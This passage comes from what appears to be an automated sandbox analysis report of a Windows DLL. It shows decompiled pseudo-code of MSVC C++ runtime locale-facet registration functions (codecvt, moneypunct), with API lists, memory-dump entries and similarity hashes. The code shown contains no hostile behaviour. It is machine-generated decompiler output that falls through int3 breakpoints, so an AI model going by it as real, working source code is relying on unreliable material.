																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6de96dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t935);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6de96dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t934);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6de96dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t933);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6de96df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t932);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6de96df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t931);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6de96dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6DDD6FD3(__eflags, _t930);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6de96df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6DDD6FD3(__eflags, _t929);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6de96dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6DDD6FD3(__eflags, _t928);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6de96dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6DDD6FD3(__eflags, _t927);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6de96db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6DDD6FD3(__eflags, _t926);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6de96de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6DDD6FD3(__eflags, _t925);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6de96dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6DDD6FD3(__eflags, _t924);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6de96db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6DDD6FD3(__eflags, _t923);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6de96de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6DDD6FD3(__eflags, _t922);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6de96e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEEFC
int.LIBCPMT ref: 6DDDEF13

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDEF36
std::_Facet_Register.LIBCPMT ref: 6DDDEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDEF8B

Strings

0km, xrefs: 6DDDEF07

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0km
API String ID: 2594415655-2032977153
Opcode ID: 247bbe64f120a902a09371ea69e429a519a6664013bf925d00c3f5e35492fa49
Instruction ID: 00de44ad832d3e67fdb019f8f757dcdc7e7822f1b05845c6a3432a11bf288bc6
Opcode Fuzzy Hash: 247bbe64f120a902a09371ea69e429a519a6664013bf925d00c3f5e35492fa49
Instruction Fuzzy Hash: 1211A0B6909519DBCF01FB64C850ABDB7B5AF54318F264009F511AB290DF749E058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t418 - 0x14, 0);
				_t399 =  *0x6de96dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6DDB161C(0x6de96d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6DDD66BA(_t418 - 0x14);
					return E6DDF0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6DDE12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t418 - 0x20);
							E6DDF3D74(_t418 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t389, _t399, 0x14);
							E6DDD6653(_t418 - 0x14, 0);
							_t400 =  *0x6de96dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6DDB161C(0x6de96d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6DDD66BA(_t418 - 0x14);
								return E6DDF0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6DDE1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t418 - 0x20);
										E6DDF3D74(_t418 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t296, _t390, _t400, 0x14);
										E6DDD6653(_t418 - 0x14, 0);
										_t401 =  *0x6de96db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6DDB161C(0x6de96d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6DDD66BA(_t418 - 0x14);
											return E6DDF0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6DDE13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t418 - 0x20);
													E6DDF3D74(_t418 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t296, _t391, _t401, 0x14);
													E6DDD6653(_t418 - 0x14, 0);
													_t402 =  *0x6de96ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6DDB161C(0x6de96d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6DDD66BA(_t418 - 0x14);
														return E6DDF0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6DDE1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t418 - 0x20);
																E6DDF3D74(_t418 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t296, _t392, _t402, 0x14);
																E6DDD6653(_t418 - 0x14, 0);
																_t403 =  *0x6de96de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6DDB161C(0x6de96d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6DDD66BA(_t418 - 0x14);
																	return E6DDF0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6DDE1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t418 - 0x20);
																			E6DDF3D74(_t418 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t296, _t393, _t403, 0x14);
																			E6DDD6653(_t418 - 0x14, 0);
																			_t404 =  *0x6de96dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6DDB161C(0x6de96da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6DDD66BA(_t418 - 0x14);
																				return E6DDF0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6DDE14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t418 - 0x20);
																						E6DDF3D74(_t418 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t296, _t394, _t404, 0x14);
																						E6DDD6653(_t418 - 0x14, 0);
																						_t405 =  *0x6de96dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6DDB161C(0x6de96d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6DDD66BA(_t418 - 0x14);
																							return E6DDF0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6DDE1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t418 - 0x20);
																									E6DDF3D74(_t418 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t296, _t395, _t405, 0x14);
																									E6DDD6653(_t418 - 0x14, 0);
																									_t406 =  *0x6de96e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6DDB161C(0x6de96dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6DDD66BA(_t418 - 0x14);
																										return E6DDF0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6DDE15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t418 - 0x20);
																												E6DDF3D74(_t418 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t296, _t396, _t406, 0x14);
																												E6DDD6653(_t418 - 0x14, 0);
																												_t407 =  *0x6de96dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6DDB161C(0x6de96d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6DDD66BA(_t418 - 0x14);
																													return E6DDF0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6DDE162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6DDB1438(_t359);
																															E6DDF3D74(_t418 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de3851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6de3c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6DDE542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6DDF0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6DDD6FD3(__eflags, _t397);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6de96dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6DDD6FD3(__eflags, _t396);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6de96e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6DDD6FD3(__eflags, _t395);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6de96dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6DDD6FD3(__eflags, _t394);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6de96dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6DDD6FD3(__eflags, _t393);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6de96de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6DDD6FD3(__eflags, _t392);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6de96ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6DDD6FD3(__eflags, _t391);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6de96db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6DDD6FD3(__eflags, _t390);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6de96dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6DDD6FD3(__eflags, _t389);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6de96dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF760
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF76A
int.LIBCPMT ref: 6DDDF781

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF7A4
std::_Facet_Register.LIBCPMT ref: 6DDDF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF7F9

Strings

xmm, xrefs: 6DDDF775

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xmm
API String ID: 113178234-359119008
Opcode ID: 1ef2a3811653610503b5510cda141f2479e76806c7f6e365d4d3bdb21c110e8d
Instruction ID: 4649a11f95f179ccca7485d4ff20ee24cface9f090afb8d263b33e5ec7f1b258
Opcode Fuzzy Hash: 1ef2a3811653610503b5510cda141f2479e76806c7f6e365d4d3bdb21c110e8d
Instruction Fuzzy Hash: 3511C275909119DBCF01FBA4C844AFDB7B4AF54318F264009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t462 - 0x14, 0);
				_t441 =  *0x6de96dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6DDB161C(0x6de96d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6DDD66BA(_t462 - 0x14);
					return E6DDF0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6DDE1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t462 - 0x20);
							E6DDF3D74(_t462 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t430, _t441, 0x14);
							E6DDD6653(_t462 - 0x14, 0);
							_t442 =  *0x6de96dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6DDB161C(0x6de96d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6DDD66BA(_t462 - 0x14);
								return E6DDF0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6DDE12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t462 - 0x20);
										E6DDF3D74(_t462 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t327, _t431, _t442, 0x14);
										E6DDD6653(_t462 - 0x14, 0);
										_t443 =  *0x6de96dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6DDB161C(0x6de96d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6DDD66BA(_t462 - 0x14);
											return E6DDF0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6DDE1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t462 - 0x20);
													E6DDF3D74(_t462 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t327, _t432, _t443, 0x14);
													E6DDD6653(_t462 - 0x14, 0);
													_t444 =  *0x6de96db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6DDB161C(0x6de96d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6DDD66BA(_t462 - 0x14);
														return E6DDF0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6DDE13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t462 - 0x20);
																E6DDF3D74(_t462 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t327, _t433, _t444, 0x14);
																E6DDD6653(_t462 - 0x14, 0);
																_t445 =  *0x6de96ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6DDB161C(0x6de96d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6DDD66BA(_t462 - 0x14);
																	return E6DDF0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6DDE1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t462 - 0x20);
																			E6DDF3D74(_t462 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t327, _t434, _t445, 0x14);
																			E6DDD6653(_t462 - 0x14, 0);
																			_t446 =  *0x6de96de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6DDB161C(0x6de96d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6DDD66BA(_t462 - 0x14);
																				return E6DDF0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6DDE1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t462 - 0x20);
																						E6DDF3D74(_t462 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t327, _t435, _t446, 0x14);
																						E6DDD6653(_t462 - 0x14, 0);
																						_t447 =  *0x6de96dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6DDB161C(0x6de96da8);
